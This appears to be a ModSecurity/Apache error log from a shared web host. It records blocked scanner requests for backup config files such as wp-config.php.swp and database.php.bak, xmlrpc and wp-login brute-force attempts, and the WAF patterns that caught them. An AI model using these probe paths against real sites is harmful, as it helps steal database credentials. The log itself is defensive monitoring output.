[Tue May 26 14:41:58.844760 2026] [security2:error] [pid 636820:tid 637057] [client 43.156.66.8:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99aAAAAGs"]
[Tue May 26 14:41:58.853271 2026] [security2:error] [pid 636820:tid 636956] [client 43.156.66.8:34364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahVj3a_r6oOphPch7B99ZgAAAAY"]
[Tue May 26 14:41:59.236133 2026] [core:crit] [pid 636820:tid 637067] (13)Permission denied: [client 40.77.167.17:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:59.346661 2026] [security2:error] [pid 636820:tid 636982] [client 202.141.83.254:53977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj36_r6oOphPch7B99sgAAACA"]
[Tue May 26 14:41:59.346780 2026] [security2:error] [pid 636820:tid 636982] [client 202.141.83.254:53977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj36_r6oOphPch7B99sgAAACA"]
[Tue May 26 14:41:59.363077 2026] [security2:error] [pid 636820:tid 636964] [client 108.136.162.67:56653] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php.swp"] [unique_id "ahVj36_r6oOphPch7B99swAAAA4"]
[Tue May 26 14:42:00.240659 2026] [security2:error] [pid 636820:tid 637004] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj4K_r6oOphPch7B99xQAAADY"]
[Tue May 26 14:42:00.266797 2026] [security2:error] [pid 636820:tid 637030] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj36_r6oOphPch7B99vAAAAFA"]
[Tue May 26 14:42:00.676323 2026] [security2:error] [pid 636820:tid 637040] [client 108.136.162.67:56820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php~"] [unique_id "ahVj4K_r6oOphPch7B991QAAAFo"]
[Tue May 26 14:42:01.477357 2026] [security2:error] [pid 636820:tid 636992] [client 108.136.162.67:57112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/wp-config.old"] [unique_id "ahVj4a_r6oOphPch7B994wAAACo"]
[Tue May 26 14:42:01.744071 2026] [security2:error] [pid 636820:tid 637009] [client 108.136.162.67:57112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php.bak"] [unique_id "ahVj4a_r6oOphPch7B996AAAADs"]
[Tue May 26 14:42:02.475811 2026] [security2:error] [pid 636820:tid 636971] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj4a_r6oOphPch7B999wAAABU"]
[Tue May 26 14:42:02.555121 2026] [security2:error] [pid 636820:tid 637030] [client 108.136.162.67:57400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php-dist"] [unique_id "ahVj4q_r6oOphPch7B9-BgAAAFA"]
[Tue May 26 14:42:03.259932 2026] [security2:error] [pid 636820:tid 637064] [client 89.221.206.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj46_r6oOphPch7B9-EgAAAHI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:42:03.383134 2026] [security2:error] [pid 636820:tid 637013] [client 108.136.162.67:57567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php.old"] [unique_id "ahVj46_r6oOphPch7B9-GQAAAD8"]
[Tue May 26 14:42:04.038849 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj46_r6oOphPch7B9-IgAAAGI"]
[Tue May 26 14:42:04.169261 2026] [security2:error] [pid 636820:tid 637044] [client 108.136.162.67:57720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.bak"] [unique_id "ahVj5K_r6oOphPch7B9-LwAAAF4"]
[Tue May 26 14:42:04.611464 2026] [security2:error] [pid 636820:tid 636968] [client 89.221.206.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj5K_r6oOphPch7B9-QgAAABI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 14:42:05.021208 2026] [security2:error] [pid 636820:tid 636970] [client 108.136.162.67:57932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.old"] [unique_id "ahVj5a_r6oOphPch7B9-SgAAABQ"]
[Tue May 26 14:42:05.494679 2026] [security2:error] [pid 636820:tid 636884] [remote 5.42.158.148:49868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVj5a_r6oOphPch7B9-TgAAOj8"]
[Tue May 26 14:42:05.818804 2026] [security2:error] [pid 636820:tid 637010] [client 108.136.162.67:58181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.txt"] [unique_id "ahVj5a_r6oOphPch7B9-YAAAADw"]
[Tue May 26 14:42:05.935829 2026] [security2:error] [pid 636820:tid 636960] [client 72.207.113.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj5a_r6oOphPch7B9-YwAAAAo"], referer: http://www.anujtradingco.com/
[Tue May 26 14:42:06.100747 2026] [autoindex:error] [pid 636820:tid 637038] [client 194.163.174.253:52282] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:42:06.430950 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj5q_r6oOphPch7B9-aQAAAHU"]
[Tue May 26 14:42:07.500453 2026] [security2:error] [pid 636820:tid 637053] [client 72.207.113.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj56_r6oOphPch7B9-jAAAAGc"], referer: http://www.anujtradingco.com/features/header-with-parallax/
[Tue May 26 14:42:08.669844 2026] [security2:error] [pid 636820:tid 637046] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj6K_r6oOphPch7B9-mgAAAGA"]
[Tue May 26 14:42:09.996883 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:19955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj6a_r6oOphPch7B9-ywAAAB8"]
[Tue May 26 14:42:09.997041 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:19955] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj6a_r6oOphPch7B9-ywAAAB8"]
[Tue May 26 14:42:10.682549 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj6q_r6oOphPch7B9-4AAAADE"]
[Tue May 26 14:42:11.668261 2026] [security2:error] [pid 636820:tid 637067] [client 154.161.32.97:57053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVj66_r6oOphPch7B9_AAAAAHU"]
[Tue May 26 14:42:11.668424 2026] [security2:error] [pid 636820:tid 637067] [client 154.161.32.97:57053] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVj66_r6oOphPch7B9_AAAAAHU"]
[Tue May 26 14:42:12.785246 2026] [security2:error] [pid 636820:tid 636973] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj7K_r6oOphPch7B9_IwAAABc"]
[Tue May 26 14:42:13.840691 2026] [security2:error] [pid 636820:tid 637074] [client 85.208.96.206:13274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVj7a_r6oOphPch7B9_VgAAAHw"]
[Tue May 26 14:42:13.840845 2026] [security2:error] [pid 636820:tid 637074] [client 85.208.96.206:13274] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVj7a_r6oOphPch7B9_VgAAAHw"]
[Tue May 26 14:42:14.576204 2026] [security2:error] [pid 636820:tid 637058] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_XAAAAGw"]
[Tue May 26 14:42:14.926711 2026] [security2:error] [pid 636820:tid 636955] [client 104.28.119.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_aAAAAAU"]
[Tue May 26 14:42:15.128150 2026] [security2:error] [pid 636820:tid 636965] [client 107.172.50.134:59568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_aQAAAA8"]
[Tue May 26 14:42:16.260706 2026] [security2:error] [pid 636820:tid 637072] [client 107.172.50.134:59568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahVj76_r6oOphPch7B9_jAAAAHo"]
[Tue May 26 14:42:16.872060 2026] [security2:error] [pid 636820:tid 636963] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj8K_r6oOphPch7B9_pQAAAA0"]
[Tue May 26 14:42:18.966954 2026] [security2:error] [pid 636820:tid 636986] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj8q_r6oOphPch7B9_8wAAACQ"]
[Tue May 26 14:42:20.328042 2026] [security2:error] [pid 636820:tid 636959] [client 202.141.83.254:53973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARgAAAAk"]
[Tue May 26 14:42:20.328181 2026] [security2:error] [pid 636820:tid 636959] [client 202.141.83.254:53973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARgAAAAk"]
[Tue May 26 14:42:20.587338 2026] [security2:error] [pid 636820:tid 637063] [client 62.60.130.227:58406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARwAAAHE"]
[Tue May 26 14:42:20.960945 2026] [security2:error] [pid 636820:tid 637077] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj9K_r6oOphPch7B-ATwAAAH8"]
[Tue May 26 14:42:20.977114 2026] [security2:error] [pid 636820:tid 636991] [client 62.60.130.227:54743] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9K_r6oOphPch7B-AWwAAACk"]
[Tue May 26 14:42:21.311744 2026] [security2:error] [pid 636820:tid 637028] [client 62.60.130.227:54823] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9a_r6oOphPch7B-AbgAAAE4"]
[Tue May 26 14:42:21.324211 2026] [security2:error] [pid 636820:tid 637015] [client 185.207.250.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj9a_r6oOphPch7B-AbQAAAEE"]
[Tue May 26 14:42:21.324750 2026] [security2:error] [pid 636820:tid 637020] [client 185.207.250.218:42120] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVj9a_r6oOphPch7B-AZQAAAEY"]
[Tue May 26 14:42:21.639059 2026] [security2:error] [pid 636820:tid 637049] [client 62.60.130.227:63142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9a_r6oOphPch7B-AbwAAAGM"]
[Tue May 26 14:42:22.002594 2026] [security2:error] [pid 636820:tid 636967] [client 62.60.130.227:57426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AiAAAABE"]
[Tue May 26 14:42:22.031060 2026] [security2:error] [pid 636820:tid 636982] [client 185.207.250.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj9a_r6oOphPch7B-AhwAAACA"]
[Tue May 26 14:42:22.034168 2026] [security2:error] [pid 636820:tid 637066] [client 185.207.250.218:42136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVj9a_r6oOphPch7B-AhQAAAHQ"]
[Tue May 26 14:42:22.343238 2026] [security2:error] [pid 636820:tid 636966] [client 62.60.130.227:55358] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AjgAAABA"]
[Tue May 26 14:42:22.510214 2026] [security2:error] [pid 636820:tid 636833] [remote 84.247.181.196:39736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVj9q_r6oOphPch7B-AjQAAcgw"]
[Tue May 26 14:42:22.692470 2026] [security2:error] [pid 636820:tid 636999] [client 62.60.130.227:49706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AogAAADE"]
[Tue May 26 14:42:23.052481 2026] [security2:error] [pid 636820:tid 637039] [client 62.60.130.227:65255] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVj96_r6oOphPch7B-ArwAAAFk"]
[Tue May 26 14:42:23.098774 2026] [security2:error] [pid 636820:tid 636998] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj9q_r6oOphPch7B-AoQAAADA"]
[Tue May 26 14:42:24.487127 2026] [security2:error] [pid 636820:tid 636959] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj-K_r6oOphPch7B-AzQAAAAk"]
[Tue May 26 14:42:27.416817 2026] [security2:error] [pid 636820:tid 636968] [client 114.119.139.115:34081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/category/html"] [unique_id "ahVj-6_r6oOphPch7B-BXQAAABI"], referer: https://glorodavionics.com/category/html
[Tue May 26 14:42:27.463697 2026] [security2:error] [pid 636820:tid 637052] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj-6_r6oOphPch7B-BSQAAAGY"]
[Tue May 26 14:42:28.816865 2026] [security2:error] [pid 636820:tid 637001] [client 192.228.39.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_K_r6oOphPch7B-BiwAAADM"]
[Tue May 26 14:42:29.262232 2026] [security2:error] [pid 636820:tid 637013] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_K_r6oOphPch7B-BoQAAAD8"]
[Tue May 26 14:42:30.786080 2026] [security2:error] [pid 636820:tid 637051] [client 202.141.83.254:53771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj_q_r6oOphPch7B-B0QAAAGU"]
[Tue May 26 14:42:30.786191 2026] [security2:error] [pid 636820:tid 637051] [client 202.141.83.254:53771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj_q_r6oOphPch7B-B0QAAAGU"]
